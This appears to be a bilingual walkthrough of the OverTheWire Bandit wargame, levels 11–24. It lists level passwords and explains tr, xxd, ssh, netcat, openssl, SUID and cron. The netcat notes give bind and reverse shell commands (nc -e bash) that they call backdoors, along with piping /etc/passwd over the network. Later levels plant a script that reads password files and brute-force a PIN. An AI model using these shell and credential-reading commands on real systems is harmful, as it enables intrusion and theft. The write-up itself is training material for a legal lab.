1 boJ9jbbUNNfktd78OOpsqOltutMc3MY1
2 CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9
3 UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK
4 pIwrPrtPN36QITSp3EQaw936yaFoFgAB
5 koReBOKuIDDepwhWk7jZC0RTdopnAYKh
6 DXjZPULLxYr17uwoI01bNLQbtFemEgo7
7 HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs
8 cvX2JJa4CFALtqS87jk27qwqGhBM9plV
9 UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR
10 truKLdjsbJ5g7yyJ2X2R0o3a5HQJFuLk
11 IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR
12 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu
Q11. The password for the next level is stored in the file data.txt, where all lowercase (a-z) and uppercase (A-Z) letters have been rotated by 13 positions
a rotted by 13 -> m
n rotted by 13 -> z
N rotted by 13 -> Z
A rotted by 13 -> M
bandit11@bandit:~$ cat data.txt
Gur cnffjbeq vf 5Gr8L4qetPEsPk8htqjhRK8XSP6x2RHh
bandit11@bandit:~$ cat data.txt | tr a-zA-Z n-za-mN-ZA-M #位置不能错
The password is 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu
tr
指令详解Linux tr 命令用于转换或删除文件中的字符。tr 指令从标准输入设备读取数据,经过字符串转译后,将结果输出到标准输出设备。
testfile文件中的内容如下:
$ cat testfile #testfile原来的内容
Linux
$ cat testfile | tr a-z A-Z #转换后的输出
LINUX
12. The password for the next level is stored in the file data.txt, which is a hexdump of a file that has been repeatedly compressed. For this level it may be useful to create a directory under /tmp in which you can work using mkdir. For example: mkdir /tmp/myname123. Then copy the datafile using cp, and rename it using mv (read the manpages!)
bandit12@bandit:/tmp/ll$ xxd -r data.txt data.bin
bandit12@bandit:/tmp/ll$ file data.bin
data.bin: gzip compressed data, was "data2.bin", last modified: Tue Oct 16 12:00:23 2018, max compression, from Unix
bandit12@bandit:/tmp/ll$ mv data.bin data.gz
bandit12@bandit:/tmp/ll$ gzip -d data2.bin
bandit12@bandit:/tmp/ll$ file data2.bin
data: bzip2 compressed data, block size = 900k
#一系列重命名解压后,得到密码为8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL
xxd
详解xxd的作用就是将一个文件以十六进制的形式显示出来,具体选项如下。
选项 | 描述 |
---|---|
-a |
它的作用是自动跳过空白内容,默认是关闭的 |
-c |
它的后面加上数字表示每行显示多少字节的十六进制数,默认是16字节。 |
-g |
设定以几个字节为一块,默认为2字节。 |
-l |
显示多少字节的内容。 |
-r |
十六进制转二进制 |
-s |
后面接【±】和address.加号表示从地址处开始的内容,减号表示距末尾address开始的内容。 |
具体用法:
xxd -a -c 12 -g 1 -l 512 -s +0x200 [inputfile]
#【自动跳过空白】【每行显示12字节】【一个字节一块】【显示512字节内容】【从0x200开始】【输入文件】
file
命令该命令用来识别文件类型,也可用来辨别一些文件的编码格式。它是通过查看文件的头部信息来获取文件类型,而不是像Windows通过扩展名来确定文件类型的。
13. The password for the next level is stored in /etc/bandit_pass/bandit14 and can only be read by user bandit14. For this level, you don’t get the next password, but you get a private SSH key that can be used to log into the next level. Note: localhost is a hostname that refers to the machine you are working on
bandit13@bandit:~$ ssh -i ssh.privateKey bandit14@localhost
1.登录
ssh -p22 [email protected]
2.直接执行命令 -->最好全路径
ssh [email protected] ls -ltr /backup/data
==>ssh [email protected] /bin/ls -ltr /backup/data
3.查看已知主机
cat /root/.ssh/known_hosts
4.ssh远程执行sudo命令
ssh -t [email protected] sudo rsync hosts /etc/
5.scp
1.功能 -->远程文件的安全(加密)拷贝
scp -P22 -r -p /home/omd/h.txt [email protected]:/home/omd/
2.scp知识小结
scp是加密远程拷贝,cp为本地拷贝
可以推送过去,也可以拉过来
每次都是全量拷贝(效率不高,适合第一次),增量拷贝用rsync
6.免密登录
bandit14@bandit:~$ ssh-keygen
14. The password for the next level can be retrieved by submitting the password of the current level to port 30000 on localhost.
bandit14@bandit:~$ telnet localhost 30000
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
Correct!
BfMYroe26WYalil77FoDi9qh59eK5xNr
Connection closed by foreign host.
## 也可以用nc
bandit14@bandit:~$ nc localhost 30000
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
Correct!
BfMYroe26WYalil77FoDi9qh59eK5xNr
其实netcat的原理很简单,它就是从网络的一端读入数据,然后输出到网络的另一端,它可以使用tcp和udp协议.之所以叫做netcat,因为它是网络上的cat,想象一下cat的功能,读出一个文件的内容,然后输出到屏幕上(默认的stdout是屏幕,当然可以重定向到其他地方).netcat也是如此,它读取一端的输入,然后传送到网络的另一端。netcat的命令行程序名字为nc,是netcat的缩写,安装完了是找不到netcat这个程序的.
options:
-c shell commands as `-e'; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-k set keepalive option on socket
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of secs
-s addr local source address
-T tos set Type Of Service
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-C Send CRLF as line-ending
-z zero-I/O mode [used for scanning]
这是最简单的使用方式,nc
nc http://www.apache.org/ 80
nc -l -p <portnumber> #这里-l参数表明nc处于监听模式,-p指定端口号.
nc -l -p 1234 #[假设这台主机ip为192.168.0.1]
然后从客户端输入,nc 192.168.0.1 1234 然后你从任一端输入的数据就会显示在另一端了.其实netcat的server和client的区别并不大,区别仅仅在于谁执行了-l来监听端口,一旦连接建立以后,就没有什么区别了。
从这里我们也可以了解netcat的工作原理了,通过网络链接读写数据.[It is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol]–@stake主页是这么说的.(netcat是一个使用TCP或者UDP在网络连接上读写数据的工具)
nc有一个-e的选项,用来指定在连接后执行的程序.
在windows平台上可以指定-e cmd.exe[winxp,win2000,]
如果是98就指定command.exe.linux则指定-e bash
,或者任何你喜欢的shell,或者是你自己编写的程序,通常是做为后门
指定-e
的效果是由你指定的程序代替了nc自己来接受另一端的输入,并把输入(命令)后反馈的结果显示到另一端.
server: nc -l -p 1234 -e bash
client: nc 192.168.0.1 1234 #就可以远程登陆server了
#其实我们不一定非要在server端指定-e,也可以在client端指定.
server: nc -l -p 1234
client: nc -e 192.168.0.1 1234
# 这样,就相当于在server上远程登陆client了.
# 前面说过,有关client和server的区分是没有什么意义的.
# 谁做为telnet server的标准只有一个,谁执行了-e [shell].
nc可以从任何地方接受输入,不仅仅是-e指定的程序,还可以是文件;nc可以将输入重定向到任何地方,不仅仅是默认的屏幕.指定的方法很简单,使用 > 和 < 重定向符号.
例1; server: nc -l -c -p 1234 [这是很危险的,不要放在公网上.
client: nc 192.168.0.1 1234 >somefile
例2; server: nc -l -c -p 1234 >somefile
client: nc 192.168.0.1 1234 </etc/passwd
其中,-c选项指定在文件传输结束的时候关闭链接,这是GNU netcat特有的选项.不指定-c或者你使用@stake的netcat的话,你要在文件传输结束是按Ctrl+c关闭链接.
nc -z -w 2 -v -v http://www.somewhere.com/ port[,port[,port-port]]
# -z 指定zero-I/O 模式,它让netcat禁止任何来自源系统的I/O,如果不指定它,netcat会无限期的挂起端口.
# 所以在网络扫描时要指定-z选项.
# -w 指定超时时间,单位为秒
# -v 详细模式, twice更详细
例: nc -z -w 2 -v -v http://www.somewhere.com/ 20-30,80,100-112,443
不过我不赞成使用netcat来扫描,因为我觉得它的速度不够快,而且得到的信息不够全,而且更重要的是不够隐蔽.nmap是个更好的选择。
unix的强大不在于其某个程序自身,而在于多个简单工具的组合,只要发挥你的想象力,你会发现unix的世界是多么美好.
例1.[背景]有一台主机被怀疑遭到入侵并被安装了rootkit,现在要和另一台干净的主机做一下比较.
## 被入侵主机:
find /etc -type f|xargs md5sum|nc -l -p 1234 -c
## 干净主机:
nc 192.168.0.1 1234|md5sum -c -| grep -v OK
# md5sum -c 表示检查给定列表的md5sum. 后跟文件名,这里指定 - ,即标准输入.
# 当文件的md5sum匹配是显示OK,我们过滤掉这些行,显示不匹配的行
# -v, --invert-match select non-matching lines
例2.检查被入侵的主机上的suid和sgid程序.
# 被入侵主机:
find / -xdev -type f -user root ( -perm -4000 -o -perm -2000 )|xargs md5sum |nc -l -c -p 1234
# 远程主机:
nc 192.168.0.33 1234|md5sum -c -|grep -v OK
例3. 远程对被入侵主机做镜像.
# 被入侵主机:
dd if=/dev/hda1 bs=1024|nc -l -p 1234 -c
# 远程主机:
nc 192.168.0.1 1234 >/check/host.disk1
# 然后,可以利用linux内核的loopback特性,把host.disk以只读的方式mount上,然后就可以做取证分析了.
# [如果真的做取证分析,一定不要在原始的受害主机硬盘上find和类似的操作,因为这会修改时间标记而破坏原始的证据]
例4. 将文件压缩后再传送.
如果你的文件很大,何不先压缩它呢,利用管道,我们甚至不用生成压缩后的中间文件!
# 源主机:
tar czf - work | nc -l -c -p 1234
# -c shell commands as `-e'; use /bin/sh to exec [dangerous!!]
# 目的主机:
nc 192.168.0.1 1234 | tar xzvf -
curl icanhazip.com
curl ifconfig.me
curl curlmyip.com
curl ip.appspot.com
curl ipinfo.io/ip
curl ipecho.net/plain
15. The password for the next level can be retrieved by submitting the password of the current level to port 30001 on localhost using SSL encryption.
Helpful note: Getting “HEARTBEATING” and “Read R BLOCK”? Use -ign_eof and read the “CONNECTED COMMANDS” section in the manpage. Next to ‘R’ and ‘Q’, the ‘B’ command also works in this version of that command…
bandit15@bandit:~$ echo BfMYroe26WYalil77FoDi9qh59eK5xNr | openssl s_client -quiet -connect localhost:30001
depth=0 CN = localhost
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = localhost
verify return:1
Correct!
cluFn7wTiGryunymYOu4RcffSxQluehd
# -quiet: No s_client output
openssl s_client
s_client为一个SSL/TLS客户端程序,与s_server对应,它不仅能与s_server进行通信,也能与任何使用ssl协议的其他服务程序进行通信。
openssl s_client [-host host] [-port port] [-connect host:port] [-verify depth] [-cert filename]
[-certform DER|PEM] [-key filename] [-keyform DER|PEM] [-pass arg] [-CApath directory] [-CAfile filename]
[-reconnect][-pause] [-showcerts] [-debug] [-msg] [-state] [-nbio_test] [-nbio][-crlf] [-ign_eof] [-no_ign_eof]
[-quiet] [-ssl2] [-ssl3] [-tls1_1] [-tls1_2] [-tls1] [-dtls1] [-no_ssl2][-no_ssl3] [-no_tls1] [-no_tls1_1]
[-no_tls1_2] [-bugs] [-cipher cipherlist] [-starttls protocol] [-engine id] [-tlsextdebug] [-no_ticket]
[-sess_out filename] [-sess_in filename] [-rand file(s)]
#-host host:设置服务地址; -port port:设置服务端口,默认为4433。
#-connect host:port:设置服务器地址和端口号。如果没有设置,则默认为本地主机以及端口号4433。
bandit16@bandit:~$ nmap localhost -p31000-32000
Starting Nmap 7.40 ( https://nmap.org ) at 2020-03-02 17:53 CET
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00022s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
31518/tcp open unknown
31790/tcp open unknown
bandit16@bandit:~$ echo cluFn7wTiGryunymYOu4RcffSxQluehd | openssl s_client -connect localhost:31790 -quiet
depth=0 CN = localhost
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = localhost
verify return:1
Correct!
-----BEGIN RSA PRIVATE KEY-----
...
vim /tmp/mark/ssh.key # copy the private key into here
chmod 400 ssh.key # only enable the owner of the key file to read
ssh -i key bandit17@localhost
17. There are 2 files in the homedirectory: passwords.old and passwords.new. The password for the next level is in passwords.new and is the only line that has been changed between passwords.old and passwords.new
NOTE: if you have solved this level and see ‘Byebye!’ when trying to log into bandit18, this is related to the next level, bandit19
diff passwords.new passwords.old
# password is : kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd
18. The password for the next level is stored in a file readme in the homedirectory. Unfortunately, someone has modified .bashrc to log you out when you log in with SSH.
c:\> ssh [email protected] -p 2220 cat readme
IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x
19. To gain access to the next level, you should use the setuid binary in the homedirectory. Execute it without arguments to find out how to use it. The password for this level can be found in the usual place (/etc/bandit_pass), after you have used the setuid binary.
bandit19@bandit:~$ ls -l
total 8
-rwsr-x--- 1 bandit20 bandit19 7296 Oct 16 2018 bandit20-do
bandit19@bandit:~$ ./bandit20-do id
uid=11019(bandit19) gid=11019(bandit19) euid=11020(bandit20) groups=11019(bandit19)
bandit19@bandit:~$ ./bandit20-do cat /etc/bandit_pass/bandit20
GbKksEFF4yrVs6il55v6gwY5aVje5f0j
-rwsr-x— permissions
1 : number of linked hard-links
bandit20: owner of the file
bandit19: to which group this file belongs to
7370: size
Oct 16 10:32 modification/creation date and time
bandit20-do: file/directory name
Permission are broken down into three octets. First octet ( -rws ) defines a permission for a file owner. In this case owner has read, write permissions, and s means that the ‘sticky bit’ (suid) is enabled, so this file will be executed with root permissions(A Sticky bit is a permission bit that is set on a file or a directory that lets only the owner of the file/directory or the root user to delete or rename the file. No other user is given privileges to delete the file created by some other user.). Second part ( r-x ) defines read and execute permissions defined for a group. The last part ( — ) defines nothing set for others ( everyone else ).
euid is used for permission checks in Linux. We cant just change to any EUID unless we are root.
Here are the rules:
– Changing to SUID or RUID is always ok
– If you are root (UID 0), you can change to any UID. This will set both EUID, RUID and SUID.
– Changing from root to any other UID
– RUID is set to according to your login.
– EUID is different from RUID only when running Set UID programs, like su
RUID, 即UID,用于在系统中标识一个用户是谁,当用户使用用户名和密码成功登录后一个Linux系统后就唯一确定了他的RUID。
EUID, 用于系统决定用户对系统资源的访问权限,通常情况下等于RUID。
SUID,用于对外权限的开放。跟RUID及EUID是用一个用户绑定不同,它是跟文件而不是跟用户绑定。
我们知道linux系统的密码都存在了/etc/shadow这个文件里。查看/etc/shadow文件的属性如下:
steve@ubuntu:~$ ll /etc/shadow
-rw-r----- 1 root shadow 1035 Mar 30 08:19 /etc/shadow
从上可以看出/etc/shadow文件是一个属于root用户及shadow 组的文件,并且只有EUID为root的用户具有读写的权限,shadow 组的具有读权限。
当你在steve用户(EUID此时也为steve)的shell下试图用vim打开这个文件时会提示权限不允许。
用过UNIX系统的人都知道,任何一个用户都可以使用passwd这个命令来得新设定自己的密码。但从上面已经知道,非root用户是无法读这个文件的,那么普通用户是如何做到修改这个文件的呢?我们知道passwd这个命令实际执行的程序是/usr/bin/passwd, 查看这个文件属性如下:
-rwsr-xr-x 1 root root 41284 Apr 8 2012 /usr/bin/passwd*
对应文件存取标志的s位就是通常说的SUID位,另外可以看到所有用户都有执行的这个程序权力。当steve用户执行passwd命令的时候。Shell会fork出一个子进程,此时进程的EUID还是steve,然后exec程序/usr/bin/passwd。exec会根据/usr/bin/passwd的SUID位会把进程的EUID设成root, 此时这个进程都获得了root权限, 得到了读写/etc/shadow文件的权限, 从而steve用户可完成密码的修改。 exec退出后会恢复steve用户的EUID为steve,这样就不会使steve用户一直拥有root权限。暂时的进行了权限的提升。
参考:https://blog.csdn.net/cheng20150809/article/details/48450531
20. There is a setuid binary in the homedirectory that does the following: it makes a connection to localhost on the port you specify as a commandline argument. It then reads a line of text from the connection and compares it to the password in the previous level (bandit20). If the password is correct, it will transmit the password for the next level (bandit21).
NOTE: Try connecting to your own network daemon to see if it works as you think
tmux # then open 2 window
# window 1
nc -l -p 2000
# window 2
./suconnect 2000
# then switch to window 1
bandit20@bandit:~$ nc -l -p 2000
bandit20@bandit:~$ nc -l -p 2000
GbKksEFF4yrVs6il55v6gwY5aVje5f0j # send the password in this level
gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr # get next level's password
21. A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
bandit21@bandit:/etc/cron.d$ cat cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
*
bandit21@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
bandit21@bandit:/etc/cron.d$
bandit21@bandit:/etc/cron.d$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI
Linux crontab和Windows task schedules非常的相似。Crontab可以用来在系统中定期的执行任务。比如:写了一个爬虫需要每天早上八点执行,就可以用到Crontab;安装的Tomcat服务器需要每天凌晨重启一次,也可以使用到Crontab。总之,几乎所有的定时任务,我们都可以通过Crontab这个工具来完成。
例如:
## 每周日 17:00 执行任务
0 17 * * sun /scripts/script.sh
## 每 10min 执行一次任务
*/10 * * * * /scripts/monitor.sh
22. A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.
bandit22@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash
myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)
echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"
cat /etc/bandit_pass/$myname > /tmp/$mytarget
## based on the sh file, we can modify the myname to bandit23,and then excute it
bandit22@bandit:/etc/cron.d$ myname='bandit23'
bandit22@bandit:/etc/cron.d$ echo $myname
bandit23
bandit22@bandit:/etc/cron.d$ mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)
bandit22@bandit:/etc/cron.d$ echo $mytarget
8ca319486bfbbc3663ea0fbe81326349
cat /tmp/8ca319486bfbbc3663ea0fbe81326349
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
23. A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash
myname=$(whoami)
cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
if [ "$i" != "." -a "$i" != ".." ];
then
echo "Handling $i"
timeout -s 9 60 ./$i
rm -f ./$i
fi
done
bandit23@bandit:/tmp/marklee$ cat test.sh # create a test.sh file in tmp
#!/bin/sh
cat /etc/bandit_pass/bandit24 > /tmp/marklee/bandit24pass
chmod 777 test.sh
cp test.sh /var/spool/bandit24
# 这题有问题答案出不来。
# 曲线救国方式(用别人的密码...)
bandit23@bandit:/tmp/marklee$ cat /tmp/bandit24/password
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
24. A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
#!/bin/bash
passwd24="UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"
for a in {0..9}{0..9}{0..9}{0..9}
do
echo $passwd24' '$a | nc localhost 30002 >> result &
done
$ sort result | uniq -u # after the shell finish
Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG